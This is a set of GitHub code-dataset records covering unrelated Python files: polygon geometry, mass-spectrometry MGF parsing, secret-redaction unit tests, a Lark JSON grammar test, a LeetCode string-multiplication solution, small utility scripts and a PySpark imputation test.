'PNONE' else p, binst, pinst, dd, gg, doc])\n\nentries.sort(key = lambda e: [e[0], e[3], e[4]])\n\ncsize = []\nfor e in head:\n csize.append(len(e))\nfor e in entries:\n for i in range(len(head)):\n csize[i] = max(csize[i], len(e[i]))\n\nsep = '+'\nseph = '+'\nfor i in range(len(head)):\n sep += '-' * (csize[i] + 2)\n seph += '=' * (csize[i] + 2)\n sep += '+'\n seph += '+'\n\nprint(sep)\ns = '|'\nfor i in range(len(head)):\n s += ' %*s |' % (csize[i], head[i])\nprint(s)\nprint(seph)\nfor e in entries:\n s = '|'\n for i in range(len(head)):\n s += ' %*s |' % (csize[i], e[i])\n print(s)\n print(sep)\n\n","repo_name":"Ravenslofty/mistral","sub_path":"docs/mkp2pdoc.py","file_name":"mkp2pdoc.py","file_ext":"py","file_size_in_byte":3292,"program_lang":"python","lang":"en","doc_type":"code","stars":101,"dataset":"github-code","pt":"67"} +{"seq_id":"18652668887","text":"import sys\nimport math\nimport numpy as np\nfrom scipy.spatial import ConvexHull\n\n# ################################################# #\n# ##### UTILS ##### #\n# ################################################# #\nepsilon = 1E-9\n\ndef value(x):\n \"\"\"Returns 0 if x is 'sufficiently close' to zero, +/- 1E-9\"\"\"\n if x >= 0 and x <= epsilon:\n return 0\n if x < 0 and -x <= epsilon:\n return 0\n return x\n\ndef intersect(x1, y1, x2, y2, x3, y3, x4, y4):\n \"\"\"\n Return the point of intersection (or None) between edges:\n e1: (x1,y1) - (x2,y2)\n e2: (x3,y3) - (x4,y4)\n Might include end-points.\n \"\"\"\n # common denominator\n da = (y4 - y3)*(x2 - x1)\n db = (x4 - x3)*(y2 - y1)\n denom = da - db\n \n if 
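mkinst() in the script above collapses sorted instance numbers into "a-b" runs, with the flush logic duplicated after the loop. A compact equivalent of that formatting:

def ranges(values):
    # Collapse sorted ints into "a-b" runs, e.g. [0,1,2,7,9,10] -> "0-2, 7, 9-10".
    out, start, prev = [], None, None
    for v in sorted(values):
        if start is None:
            start = prev = v
        elif v == prev + 1:
            prev = v
        else:
            out.append("%d-%d" % (start, prev) if start != prev else "%d" % start)
            start = prev = v
    if start is not None:
        out.append("%d-%d" % (start, prev) if start != prev else "%d" % start)
    return ", ".join(out)

assert ranges([0, 1, 2, 7, 9, 10]) == "0-2, 7, 9-10"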
value(denom) == 0:\n return None # PARALLEL OR COINCIDENT\n \n # numerators\n ux = (x4-x3)*(y1-y3) - (y4-y3)*(x1-x3)\n uy = (x2-x1)*(y1-y3) - (y2-y1)*(x1-x3)\n \n ux = ux / denom\n uy = uy / denom\n \n # line segment intersections are between 0 and 1. Both must be true\n # Special care on both boundaries w/ floating point issues.\n if value(ux) >= 0 and value(ux-1) <= 0 and value(uy) >= 0 and value(uy-1) <= 0:\n ix = x1 + ux * (x2-x1)\n iy = y1 + ux * (y2-y1)\n return (ix, iy)\n \n return None # no intersection\n\ndef computeAngleSign(x1, y1, x2, y2, x3, y3):\n \"\"\"\n Determine if angle (p1,p2,p3) is right or left turn by computing\n 3x3 determinant. If sign is + if p1-p2-p3 forms counterclockwise\n triangle. So if positive, then left turn. If zero then colinear.\n If negative, then right turn.\n \"\"\"\n val1 = (x2 - x1)*(y3 - y1)\n val2 = (y2 - y1)*(x3 - x1)\n diff = value(val1 - val2)\n if diff > 0:\n return +1\n elif diff < 0:\n return -1\n else:\n return 0\n\ndef inhalfplane(pt, q):\n \"\"\"Return True if point pt is in half-plane defined by q.\"\"\"\n signTail = computeAngleSign(pt.x(), pt.y(),\n q.head().x(), q.head().y(),\n q.tail().x(), q.tail().y())\n return signTail >= 0\n\ndef dist(p, q):\n \"\"\"Compute Euclidean distance between two points.\"\"\"\n return math.sqrt((p.x()-q.x())**2 + (p.y()-q.y())**2)\n\ndef aim (p, q):\n \"\"\"Return true if p is \"aiming towards\" q's half-plane edge.\"\"\"\n # First check if p.tail is in the half-plane of q\n inside = inhalfplane(p.tail(), q)\n\n # compute cross product of q x p to determine orientation\n # en.wikipedia.org/wiki/Cross_product#Computational_geometry\n # normalize p and q\n pnorm = Point(p.tail().x() - p.head().x(), \n p.tail().y() - p.head().y())\n qnorm = Point(q.tail().x() - q.head().x(), \n q.tail().y() - q.head().y())\n\n cross = qnorm.x()*pnorm.y() - qnorm.y()*pnorm.x()\n if inside:\n # in half-plane, so now check orientation\n return cross < 0\n else:\n # not in half-plane.\n return cross >= 0\n\ndef containedWithin(pt, p):\n \"\"\"\n Determine if pt is fully contained within p. Do so by \n summing angles with each edge in the convex polygon p.\n \"\"\"\n sum = 0\n for e in p.edges():\n C = dist(e.head(), e.tail())\n A = dist(pt, e.head())\n B = dist(pt, e.tail())\n sum += math.degrees(math.acos((A*A+B*B-C*C)/(2*A*B)))\n return value(sum-360) == 0\n\ndef convexIntersect(p, q):\n \"\"\"\n Compute and return polygon resulting from the intersection of\n two convext polygons, p and q.\n \"\"\"\n intersection = Polygon()\n pn = p.numEdges()\n qn = q.numEdges()\n k = 1\n inside = None # can't know inside until intersection\n first = None # remember 1st intersection to know when to stop\n firstp = pe = p.edges()[0] # get first edge of p and q\n firstq = qe = q.edges()[0]\n while k < 2 * (pn + qn):\n pt = pe.intersect(qe)\n if pt is not None:\n if first == None:\n first = pt\n elif pt == first:\n # stop when find first intersection again\n break\n\n intersection.add(pt.x(), pt.y())\n if inhalfplane(pe.tail(), qe):\n inside = p\n else:\n inside = q\n\n # Identify relationship between edges; either we advance\n # p or we advance q, based on whether p's current edge\n # is aiming at qe (or vice versa).\n advancep = advanceq = False\n\n if (aim(pe,qe) and aim(qe,pe)) or (not aim(pe,qe) and not aim(qe,pe)):\n if inside is p:\n advanceq = True\n elif inside is q:\n advancep = True\n else:\n # no intersection yet. 
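computeAngleSign() above is the classic 2D orientation test: the sign of a cross product, snapped to zero inside an epsilon. Stated directly on coordinate pairs:

def turn(p, q, r, eps=1e-9):
    # Sign of the 2D cross product (q-p) x (r-p):
    # +1 left turn, -1 right turn, 0 collinear (within eps).
    cross = (q[0] - p[0]) * (r[1] - p[1]) - (q[1] - p[1]) * (r[0] - p[0])
    if cross > eps:
        return 1
    if cross < -eps:
        return -1
    return 0

assert turn((0, 0), (1, 0), (1, 1)) == 1    # counterclockwise
assert turn((0, 0), (1, 0), (1, -1)) == -1  # clockwise
assert turn((0, 0), (1, 0), (2, 0)) == 0    # collinear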
Choose based on\n # which one is \"outside\"\n if inhalfplane(pe.tail(), qe):\n advanceq = True\n else:\n advancep = True\n elif aim(pe, qe):\n advancep = True\n elif aim(qe, pe):\n advanceq = True\n\n if advancep:\n if inside is p:\n intersection.add(pe.tail().x(), pe.tail().y())\n pe = pe.next()\n elif advanceq:\n if inside is q:\n intersection.add(qe.tail().x(), qe.tail().y())\n qe = qe.next()\n\n k += 1\n \n if intersection.numPoints() == 0:\n if containedWithin(firstp.tail(), q):\n return p\n elif containedWithin(firstq.tail(), p):\n return q\n else:\n return None\n\n # Return computed intersection\n return intersection\n\n# ################################################# #\n# ##### POINT ##### #\n# ################################################# #\n\nclass Point:\n \"\"\"Represents a point in Cartesian space.\"\"\"\n\n def __init__(self, x, y):\n \"\"\"Creates a point (x,y) in Cartesian space.\"\"\"\n self._x = x\n self._y = y\n\n def copy(self):\n \"\"\"Return copy of a point.\"\"\"\n return Point(self._x, self._y)\n\n def x(self):\n \"\"\"Return x value of point.\"\"\"\n return self._x\n\n def y(self):\n \"\"\"Return y value of point.\"\"\"\n return self._y\n\n# ################################################ #\n# ##### EDGE ##### #\n# ################################################ #\n\nclass Edge:\n \"\"\"Represents an edge in Cartesian space.\"\"\"\n\n def __init__(self, head, tail):\n \"\"\"\n Creates an edge for consecutive points head and tail.\n It is assumed that head != tail\n \"\"\"\n if head == tail:\n raise ValueError(\"Can't create edge from two identical points\")\n self._head = head\n self._tail = tail\n self._next = None\n\n def head(self):\n \"\"\"Return head value of edge.\"\"\"\n return self._head\n\n def tail(self):\n \"\"\"Return tail value of edge.\"\"\"\n return self._tail\n\n def next(self):\n \"\"\"Return next edge in polygon.\"\"\"\n return self._next\n \n def setNext(self, e):\n \"\"\"Make 'e' the next edge in polygon after self.\"\"\"\n self._next = e\n\n def intersect(self, e):\n \"\"\"Return intersection between two edges (aside from end-points).\"\"\"\n if self.head() == e.head() or self.head() == e.tail():\n return None\n if self.tail() == e.head() or self.tail() == e.tail():\n return None\n\n # compute intersection of two line segments using x,y coords\n pt = intersect(self.head().x(),\n self.head().y(),\n self.tail().x(),\n self.tail().y(),\n e.head().x(),\n e.head().y(),\n e.tail().x(),\n e.tail().y())\n if pt is None:\n return None\n return Point (pt[0], pt[1])\n\n# ################################################# #\n# ##### POLYGON ##### #\n# ################################################# #\n\nclass Polygon:\n \"\"\"Represents polygon of points in Cartesian space.\"\"\"\n\n def __init__(self, pts=[]):\n \"\"\"\n Creates polygon from list of points. 
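containedWithin() above sums acos() angles to 360°, which is numerically fragile (acos can receive arguments just outside [-1, 1]). For a convex polygon with counterclockwise vertices, a per-edge orientation test avoids that; a sketch:

def inside_convex(pt, poly, eps=1e-9):
    # pt is inside (or on the boundary of) a CCW convex polygon iff it
    # is never strictly to the right of any edge.
    n = len(poly)
    for i in range(n):
        ax, ay = poly[i]
        bx, by = poly[(i + 1) % n]
        if (bx - ax) * (pt[1] - ay) - (by - ay) * (pt[0] - ax) < -eps:
            return False
    return True

assert inside_convex((0.5, 0.5), [(0, 0), (1, 0), (1, 1), (0, 1)])
assert not inside_convex((2.0, 0.5), [(0, 0), (1, 0), (1, 1), (0, 1)])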
If omitted, polygon is empty.\n \"\"\"\n self.points = []\n for pt in pts:\n self.points.append(pt.copy())\n\n def valid(self):\n \"\"\"A polygon becomes valid with three or more points.\"\"\"\n return len(self.points) >= 3\n\n def numEdges(self):\n \"\"\"Return the number of edges in polygon.\"\"\"\n if len(self.points) < 1:\n return 0\n elif len(self.points) == 2:\n return 1\n else:\n return len(self.points)\n\n def edges(self):\n \"\"\"Return edges in the polygon, in order.\"\"\"\n order = []\n for i in range(0, len(self.points)-1):\n order.append(Edge(self.points[i], self.points[i+1]))\n\n if self.valid():\n n = len(self.points)\n order.append(Edge(self.points[n-1], self.points[0]))\n\n # Now link edges to next one in the chain. Make sure to\n # link back to start\n for i in range(len(order)-1):\n order[i].setNext(order[i+1])\n order[-1].setNext(order[0])\n return order\n\n def numPoints(self):\n \"\"\"Return the number of points in polygon.\"\"\"\n return len(self.points)\n\n def add(self, x, y):\n \"\"\"Extend polygon with additional (x,y) point.\"\"\"\n self.points.append(Point(x,y))\n n = len(self.points)\n\n def make_convex(self):\n pts = []\n for pt in self.points:\n pts.append((pt.x(), pt.y()))\n pts = np.array(pts)\n pts = pts[ConvexHull(pts).vertices]\n print(*pts, file=sys.stderr)\n\n self.points = [Point(x, y) for (x,y) in pts]\n\n def area(self): \n \"\"\"Return the area of the polygon.\"\"\"\n area = 0\n q = self.points[-1]\n for p in self.points:\n area += p.x() * q.y() - p.y() * q.x()\n q = p\n return area / 2\n\n# ################################################ #\n# ##### MAIN ##### #\n# ################################################ #\n\nif __name__ == '__main__':\n n = int(input())\n m = int(input())\n\n p = []\n for i in range(n):\n x, y = map(int, input().split())\n p.append((x, y))\n p = np.array(p)\n p = p[ConvexHull(p).vertices]\n print(\"Pol1:\", *p, file=sys.stderr)\n\n q = []\n for i in range(m):\n x, y = map(int, input().split())\n q.append((x, y))\n q = np.array(q)\n q = q[ConvexHull(q).vertices]\n print(\"Pol2:\", *q, file=sys.stderr)\n\n inter = convexIntersect(Polygon([Point(x, y) for (x,y) in p]),\n Polygon([Point(x, y) for (x,y) in q]))\n\n if inter:\n inter.make_convex()\n area_f = abs(inter.area())\n print(area_f, file=sys.stderr)\n\n area_i = int(area_f)\n print(area_i + (area_i != area_f))\n else:\n print(0)","repo_name":"JujuDel/CodinGame","sub_path":"Puzzles/Hard/encounterSurface.py","file_name":"encounterSurface.py","file_ext":"py","file_size_in_byte":11104,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"8812210283","text":"from schemachange.cli import SecretManager\n\n\n##### test Class #####\ndef test_SecretManager_given_no_secrets_when_redact_then_return_original_value():\n sm = SecretManager()\n result = sm.redact(\"My string\")\n assert result == \"My string\"\n\n\ndef test_SecretManager_given_secrets_when_redact_on_none_then_return_none():\n sm = SecretManager()\n sm.add(\"world\")\n result = sm.redact(None)\n assert result is None\n\n\ndef test_SecretManager_given_secrets_when_redact_then_return_redacted_value():\n sm = SecretManager()\n sm.add(\"world\")\n result = sm.redact(\"Hello world!\")\n assert result == \"Hello *****!\"\n\n\ndef test_SecretManager_given_secrets_when_clear_then_should_hold_zero_secrets():\n sm = SecretManager()\n sm.add(\"world\")\n sm.add(\"Hello\")\n\n # check private variable\n assert len(sm._SecretManager__secrets) == 2\n\n sm.clear()\n\n # check 
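Polygon.area() above is the shoelace formula; the signed result is positive for counterclockwise vertex order, which is why the main block takes abs() of it. A vectorised version, cross-checked against ConvexHull.volume (which is the hull's area in 2D):

import numpy as np
from scipy.spatial import ConvexHull

def shoelace_area(pts):
    # Signed polygon area; positive for counterclockwise vertex order.
    x = np.asarray([p[0] for p in pts], dtype=float)
    y = np.asarray([p[1] for p in pts], dtype=float)
    return 0.5 * np.sum(x * np.roll(y, -1) - y * np.roll(x, -1))

square = [(0, 0), (1, 0), (1, 1), (0, 1)]
assert abs(shoelace_area(square) - 1.0) < 1e-12
assert abs(ConvexHull(np.array(square)).volume - 1.0) < 1e-12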
private variable\n assert len(sm._SecretManager__secrets) == 0\n\n\ndef test_SecretManager_given_one_secrets_when_add_range_with_None_then_Count_should_remain_one():\n sm = SecretManager()\n sm.add(\"world\")\n sm.add_range(None)\n\n assert len(sm._SecretManager__secrets) == 1\n\ndef test_SecretManager_given_one_secrets_when_add_range_with_empty_set_then_Count_should_remain_one():\n sm = SecretManager()\n sm.add(\"world\")\n\n range = set()\n sm.add_range(range)\n\n assert len(sm._SecretManager__secrets) == 1\n\ndef test_SecretManager_given_one_secrets_when_add_range_with_two_secrets_then_count_of_secrets_three():\n sm = SecretManager()\n sm.add(\"world\")\n\n range = {\"one\", \"two\"}\n sm.add_range(range)\n\n # check private variable\n assert len(sm._SecretManager__secrets) == 3\n assert \"world\" in sm._SecretManager__secrets\n assert \"one\" in sm._SecretManager__secrets\n assert \"two\" in sm._SecretManager__secrets\n\n\n##### test static methods #####\n\ndef test_SecretManager_check_global_assignment_round_trip():\n sm = SecretManager()\n\n SecretManager.set_global_manager(sm)\n assert SecretManager.get_global_manager() is sm\n\n\ndef test_SecretManager_global_redact():\n sm = SecretManager()\n sm.add(\"Hello\")\n SecretManager.set_global_manager(sm)\n\n assert SecretManager.global_redact(\"Hello World!\") == \"***** World!\"\n","repo_name":"Snowflake-Labs/schemachange","sub_path":"tests/test_SecretManager.py","file_name":"test_SecretManager.py","file_ext":"py","file_size_in_byte":2242,"program_lang":"python","lang":"en","doc_type":"code","stars":407,"dataset":"github-code","pt":"67"} +{"seq_id":"14382600486","text":"class User(UserMixin, db.Model):\n # ...\n def to_json(self):\n json_user = {\n 'url': url_for('api.get_post', id=self.id, _external=True),\n 'username': self.username,\n 'member_since': self.member_since,\n 'last_seen': self.last_seen,\n 'posts': url_for('api.get_user_posts', id=self.id, _external=True),\n 'followed_posts': url_for('api.get_user_followed_posts',\n id=self.id, _external=True),\n 'post_count': self.posts.count()\n }\n return json_user","repo_name":"anaf007/book","sub_path":"source/book/python_book/flask_web_development/code/code14-5.py","file_name":"code14-5.py","file_ext":"py","file_size_in_byte":564,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"67"} +{"seq_id":"19007111296","text":"import sys, string\n\n\ndef readStringMGF(peaksFile, scanID):\n protonMass = 1.00728\n peaks = {}\n peaksnIntensity = {}\n pepMasses = {}\n retention = -1\n charges = {}\n n = -1\n retentions = {}\n specLines = {}\n fileLines = {}\n # Reading the peaks and intensities.\n alllines = peaksFile.split(\"\\n\")\n pointer = 0\n allSpectraVector = {}\n while pointer < len(alllines):\n # line = peaksFile.readline()\n line = alllines[pointer]\n if line != \"BEGIN IONS\":\n pointer += 1\n continue\n originalLine = line\n line = line.strip()\n if line == \"BEGIN IONS\":\n # initiate an array with 2,000,000 entires of 0\n spectrumVector = [0] * 2000000\n intensityVector = [0] * 2000000\n specLines = [originalLine + \"\\n\"]\n peptide = \"\"\n stop = False\n while (True):\n pointer += 1\n if pointer == len(alllines):\n stop = True\n break\n line = alllines[pointer]\n if not line:\n continue\n # line = peaksFile.readline()\n if not line[0].isdigit():\n specLines.append(line + \"\\n\")\n if line[0:6] == \"CHARGE\":\n charge = int(''.join(c for c in line.split(\"=\")[1] if c.isdigit()))\n if line[0:6] == \"PEPMAS\":\n pepMass = 
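The tests above pin down the SecretManager contract: add/add_range tolerate None and empty sets, and redact() passes None through while masking known secrets with "*****". A minimal stand-in that satisfies those tests — illustrative only, not the schemachange implementation:

class SecretManager:
    def __init__(self):
        self.__secrets = set()

    def add(self, secret):
        # Ignore empty/None values so add_range can forward anything.
        if secret:
            self.__secrets.add(secret)

    def add_range(self, secrets):
        for s in (secrets or set()):
            self.add(s)

    def redact(self, value):
        # None passes through untouched; every known secret is masked.
        if value is None:
            return None
        for s in self.__secrets:
            value = value.replace(s, "*****")
        return value

sm = SecretManager()
sm.add("world")
assert sm.redact("Hello world!") == "Hello *****!"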
float(line.strip().split()[0][8:])\n if line[0:5] == \"DBID=\":\n line = line.strip()\n if line[5:] != \"\":\n antimartin = line[15:]\n if \"TITLE=\" in line:\n peptide = line.strip().split(\"=\")[1]\n if \"RTINSECONDS\" in line:\n retention = line.split(\"=\")[1].strip()\n else:\n break\n n += 1\n # if peptide == \"\":\n # \tpeptide=str(n)\n peptide = str(scanID)\n # peptide = \"ion\" + \"_\"+str(n)\n retentions[peptide] = retention\n peaksnIntensity[peptide] = {}\n charges[peptide] = charge\n pepMasses[peptide] = pepMass\n # charge1PepMass = int(round((2 * pepMass) - protonMass, 3) * 1000)\n # if charge1PepMass < 550 or charge1PepMass > 1800:\n # continue\n if stop:\n continue\n pointer2 = 0\n while \"END IONS\" not in line:\n specLines.append(line.strip() + \"\\n\")\n peakLine = line.strip().split()\n peakMass = round(float(peakLine[0]), 3)\n intensity = float(peakLine[1])\n if intensity == 0:\n pointer += 1\n line = alllines[pointer].strip()\n continue\n # intensity =1\n peaksnIntensity[peptide][peakMass] = intensity\n if charge == 1:\n pointer2 = int(round(peakMass, 3) * 1000)\n if pointer2 < 2000001:\n spectrumVector[pointer2] = intensity\n # intensityVector[round(peakMass,3)] = 1\n elif charge == 2:\n charge1PeakMass = int(round((2 * peakMass) - protonMass, 3) * 1000)\n # peaksnIntensity[peptide][charge1PeakMass]=intensity\n if charge1PeakMass < 2000001:\n spectrumVector[charge1PeakMass] = intensity\n # spectrumVector[int(round(peakMass,3)*1000)] = intensity\n pointer += 1\n line = alllines[pointer].strip()\n\n if \"END IONS\" in line:\n allSpectraVector[peptide] = spectrumVector\n specLines.append(line + \"\\n\")\n fileLines[peptide] = specLines\n continue\n\n return peaksnIntensity, pepMasses, charges, retentions, fileLines, allSpectraVector\n","repo_name":"bbehsaz/cyclonovo_dev","sub_path":"scripts/read_string_split_mgf_vectored.py","file_name":"read_string_split_mgf_vectored.py","file_ext":"py","file_size_in_byte":4054,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"6907058269","text":"#!/usr/bin/env python3\n\nimport json\nimport os\nfrom datetime import datetime, timedelta\n\npath = os.environ['HOME'] + '/Dropbox/.taskbook/storage/storage.json'\nfile = open(path, 'r')\ndata = json.loads(file.read())\n\n\ndef time_ago(date):\n date_fmt = '%Y%m%d %H%M%S'\n date = datetime.strptime(date.strftime(date_fmt), date_fmt)\n today = datetime.strptime(datetime.now().strftime(date_fmt), date_fmt)\n time_ago = today - date\n days, hours = time_ago.days, time_ago.seconds // 3600\n return days, hours\n\n\nboards = []\nboards.extend([v['boards'][0] for _, v in data.items() if v['boards'][0] not in boards])\nboards = sorted(set(boards))\n\nboards_count = 0\ntasks_count = 0\nfor board in boards:\n tasks_count = 0\n if boards_count < 4:\n print('${font Iosevka:bold:italic:size=12}' + '${color9}' + f'\\n{board}'.replace('@','') + '${color}' + '${font}')\n boards_count += 1\n for _, v in data.items():\n date = datetime.fromtimestamp(int(v['_timestamp']) / 1000)\n days, hours = time_ago(date)\n days_ago = (\n '${color3}' + f'{days}d {hours}h' + '${color}'\n if days > 0\n else '${color3}today${color}'\n )\n if tasks_count < 2:\n if v['boards'][0] == board:\n is_starred = '${color3}六${color}' if v['isStarred'] else ''\n if v['_isTask']:\n if not v['isComplete']:\n if not v['inProgress']:\n print(\n f' {v[\"_id\"]:02}. 
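readStringMGF() above folds doubly-charged peaks to singly-charged masses via 2*m/z − proton. The general form of that conversion for any charge state, since [M+H]+ = charge·(m/z) − (charge−1)·proton:

PROTON = 1.00728

def to_singly_charged(mz, charge):
    # Convert an observed m/z at the given charge to the equivalent
    # singly protonated mass; charge=2 reproduces the script's formula.
    return charge * mz - (charge - 1) * PROTON

assert abs(to_singly_charged(500.0, 2) - (1000.0 - PROTON)) < 1e-9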
'\n + '${color1}${color} '\n #+ f'{v[\"description\"]} {days_ago} {is_starred}'\n + f'{v[\"description\"]} {is_starred}'\n )\n if v['inProgress']:\n print(\n f' {v[\"_id\"]:02}. '\n + '${color4}${color} '\n #+ f'{v[\"description\"]} {days_ago} {is_starred}'\n + f'{v[\"description\"]} {is_starred}'\n )\n tasks_count += 1\nfile.close()\n","repo_name":"jhilker98/regolith-dotfiles","sub_path":".config/conky/scripts/taskbook.py","file_name":"taskbook.py","file_ext":"py","file_size_in_byte":2393,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"15495493835","text":"import datetime\n\ndef day_to_suffix(day):\n day=int(day)\n if day==1:\n return '1st'\n elif day==2:\n return '2nd'\n elif day==3:\n return '3rd'\n else:\n return str(day)+'th'\n\ndef date_to_text(a,b):\n if (not math.isnan(b)) :\n date_from=a.split('/')\n date_to=b.split('/')\n date_from = datetime.datetime(int(date_from[2])+2000,int(date_from[1]),int(date_from[0]))\n date_to = datetime.datetime(int(date_to[2])+2000,int(date_to[1]),int(date_to[0]))\n string = 'from ' + day_to_suffix(date_from.strftime(\"%d\")) + ' ' + date_from.strftime(\"%B\") + ' ' + date_from.strftime(\"%Y\") + ' to '+ day_to_suffix(date_to.strftime(\"%d\")) + ' ' + date_to.strftime(\"%B\")+' '+date_to.strftime(\"%Y\")\n else:\n date=a.split('/')\n date = datetime.datetime(int(date[2])+2000,int(date[1]),int(date[0]))\n string = 'on' + ' '+ day_to_suffix(date.strftime(\"%d\")) + ' ' + date.strftime(\"%B\") + ' ' + date.strftime(\"%Y\")\n return string\n \n\n","repo_name":"PetrichorIITPkd/Certificates-Maker","sub_path":"Core Data/TESTING/Date_Converter.py","file_name":"Date_Converter.py","file_ext":"py","file_size_in_byte":1011,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"3732637550","text":"import os\n\nfrom lark import Lark\n\ngrammar = open(os.path.join(os.path.dirname(__file__), \"json.lark\"), \"r\").read()\nparser = Lark(grammar, start=\"value\")\n\n\ndef test_example_json():\n json = \"\"\"\n {\n \"key\": [\"item0\", \"item1\", 3.14,\n { \"foo\": \"bar\", \"bar\": 123 }],\n \"one\": { \"two\": { \"three\": 3 } },\n \"empty object\": {},\n \"empty list\": []\n }\n \"\"\"\n\n ast = parser.parse(json)\n assert ast\n\n\ndef test_package_json():\n json = open(os.path.join(os.path.dirname(__file__), \"../package.json\"), \"r\").read()\n\n ast = parser.parse(json)\n assert ast\n","repo_name":"lucassus/lucky-script","sub_path":"lark-sandbox/json_test.py","file_name":"json_test.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"27367160539","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Oct 28 22:37:23 2022\n\n@author: yehuh\n\"\"\"\n\nimport os\n\n# Absolute path of a file\ndata_path = \"./Test/\"\n\n\ndirs = os.listdir(data_path)\n\n\nfor label in dirs:\n path = os.path.join(data_path, label)\n #print(path)\n imgs = os.listdir(path)\n for img in imgs:\n #print(img)\n if \"火狐截图\" in img:\n new_lab = img.replace(\"火狐截图\",\"\")\n #print(new_lab)\n new_path = os.path.join(path,new_lab)\n #print(new_path)\n old_path = os.path.join(path,img)\n #print(old_path)\n os.rename(old_path, new_path)\n #path = os.path.join(path, img)\n #imgs = os.listdir(path)\n '''\n for img in imgs:\n \n\n'''\n#old_name = r\"E:\\demos\\files\\reports\\details.txt\"\n#new_name = r\"E:\\demos\\files\\reports\\new_details.txt\"\n\n# Renaming the 
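The renaming script above walks one level of label directories and strips the token "火狐截图" ("Firefox screenshot") from filenames with os.rename. The same loop with pathlib, parameterised over root and token:

from pathlib import Path

def strip_token(root, token):
    # Walk one level of label directories and drop `token` from each
    # filename; `root` and `token` are the caller's to choose.
    for label_dir in Path(root).iterdir():
        if not label_dir.is_dir():
            continue
        for img in label_dir.iterdir():
            if token in img.name:
                img.rename(img.with_name(img.name.replace(token, "")))

# e.g. strip_token("./Test/", "火狐截图")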
file\n#os.rename(old_name, new_name)","repo_name":"yehuh/ImageRecognizer","sub_path":"fileRename.py","file_name":"fileRename.py","file_ext":"py","file_size_in_byte":918,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"39626168352","text":"import yaml\n\n\nclass ConfigReader():\n file_path = \"\"\n\n def __init__(self, file_path):\n self.file_path = file_path\n \n def read_config(self):\n result = {}\n with open(self.file_path) as config:\n result = yaml.safe_load(config)\n return result\n\n\nif __name__ == \"__main__\":\n c = ConfigReader(\"./config.yaml\")\n print(c.read_config())\n\n","repo_name":"Haotian9850/cloud-service-benchmarker","sub_path":"parbenchmarker/ConfigReader.py","file_name":"ConfigReader.py","file_ext":"py","file_size_in_byte":384,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"67"} +{"seq_id":"13718872498","text":"class Solution(object):\n def multiply(self, num1, num2):\n \"\"\"\n :type num1: str\n :type num2: str\n :rtype: str\n \"\"\"\n num1 = num1[::-1]; num2 = num2[::-1]\n arr = [0 for i in range(len(num1)+len(num2))]\n for i in range(len(num1)):\n for j in range(len(num2)):\n arr[i+j] += int(num1[i]) * int(num2[j])\n ans = []\n for i in range(len(arr)):\n digit = arr[i] % 10\n carry = arr[i] / 10\n if i < len(arr)-1:\n arr[i+1] += carry\n ans.insert(0, str(digit))\n while ans[0] == '0' and len(ans) > 1:\n del ans[0]\n return ''.join(ans)","repo_name":"Mr-Phoebe/ACM-ICPC","sub_path":"OJ/Leetcode/Algorithm/43. Multiply Strings.py","file_name":"43. Multiply Strings.py","file_ext":"py","file_size_in_byte":695,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"67"} +{"seq_id":"12341810533","text":"from chispa import assert_df_equality\n\nfrom cishouseholds.impute import impute_outside_uk_columns\n\n\ndef test_impute_outside_uk_columns(spark_session):\n input_df = spark_session.createDataFrame(\n data=[\n (\"2010/11/11\", \"France\", \"Yes\", \"2022/01/01\", 0),\n (None, \"France\", None, \"2022/01/01\", 1),\n (\"2020/05/21\", \"France\", \"Yes\", \"2022/01/01\", 1),\n (\"2010/05/27\", \"France\", \"No\", \"2022/01/01\", 1),\n (\"2021/07/20\", \"France\", \"Yes\", \"2022/01/01\", 1),\n (\"2010/08/13\", \"France\", \"No\", \"2022/01/01\", 1),\n ],\n schema=\"outside_uk_date_column string, outside_country_column string, outside_uk_since_column string, visit_datetime_column string, id_column integer\",\n )\n\n expected_df = spark_session.createDataFrame(\n data=[\n (None, \"France\", None, \"2022/01/01\", 1),\n (\"2020/05/21\", \"France\", \"Yes\", \"2022/01/01\", 1),\n (\"2020/05/21\", \"France\", \"No\", \"2022/01/01\", 1),\n (\"2021/07/20\", \"France\", \"Yes\", \"2022/01/01\", 1),\n (\"2021/07/20\", \"France\", \"No\", \"2022/01/01\", 1),\n (None, \"France\", \"No\", \"2022/01/01\", 0),\n ],\n schema=\"outside_uk_date_column string, outside_country_column string, outside_uk_since_column string, visit_datetime_column string, id_column integer\",\n )\n\n actual_df = impute_outside_uk_columns(\n input_df,\n outside_country_column=\"outside_country_column\",\n outside_uk_date_column=\"outside_uk_date_column\",\n outside_uk_since_column=\"outside_uk_since_column\",\n visit_datetime_column=\"visit_datetime_column\",\n id_column=\"id_column\",\n )\n assert_df_equality(actual_df, expected_df, ignore_row_order=True, 
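The multiply solution above is grade-school digit multiplication; note that its carry uses "/", which is float division on Python 3. The same algorithm with integer "//" so it runs correctly on both:

def multiply_strings(a, b):
    # Per-digit products accumulate into a result array, then one pass
    # propagates the carries with integer division.
    res = [0] * (len(a) + len(b))
    for i, da in enumerate(reversed(a)):
        for j, db in enumerate(reversed(b)):
            res[i + j] += int(da) * int(db)
    for i in range(len(res) - 1):
        res[i + 1] += res[i] // 10
        res[i] %= 10
    digits = "".join(map(str, reversed(res))).lstrip("0")
    return digits or "0"

assert multiply_strings("123", "45") == "5535"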
